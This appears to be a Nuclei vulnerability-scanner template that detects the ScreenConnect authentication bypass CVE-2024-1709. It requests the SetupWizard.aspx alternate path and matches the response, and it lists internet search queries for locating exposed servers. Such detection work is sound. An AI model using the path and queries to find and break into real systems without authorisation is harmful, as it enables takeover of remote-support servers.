55 lines
1.9 KiB
YAML
55 lines
1.9 KiB
YAML
id: CVE-2024-1709
|
|
|
|
info:
|
|
name: ConnectWise ScreenConnect 23.9.7 - Authentication Bypass
|
|
author: johnk3r
|
|
severity: critical
|
|
description: |
|
|
ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.
|
|
reference:
|
|
- https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
|
|
- https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
|
|
- https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1709
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2024-1709
|
|
cwe-id: CWE-288
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: connectwise
|
|
product: screenconnect
|
|
shodan-query: http.favicon.hash:-82958153
|
|
fofa-query: app="ScreenConnect-Remote-Support-Software"
|
|
zoomeye-query: app:"ScreenConnect Remote Management Software"
|
|
hunter-query: app.name="ConnectWise ScreenConnect software"
|
|
tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev
|
|
variables:
|
|
string: "{{rand_text_alpha(10)}}"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/SetupWizard.aspx/{{string}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "SetupWizardPage"
|
|
- "ContentPanel SetupWizard"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: kval
|
|
part: header
|
|
kval:
|
|
- Server
|
|
# digest: 4b0a00483046022100df42d248b92130b0997228abe4ff00197ca95319ec494fcb457e36f99947b38b022100f14f62eb21d2dc5ebb6f7d9b2e3df0501572ace6e67a5cad42153418c3fae0b9:922c64590222798bb761d5b6d8e72950 |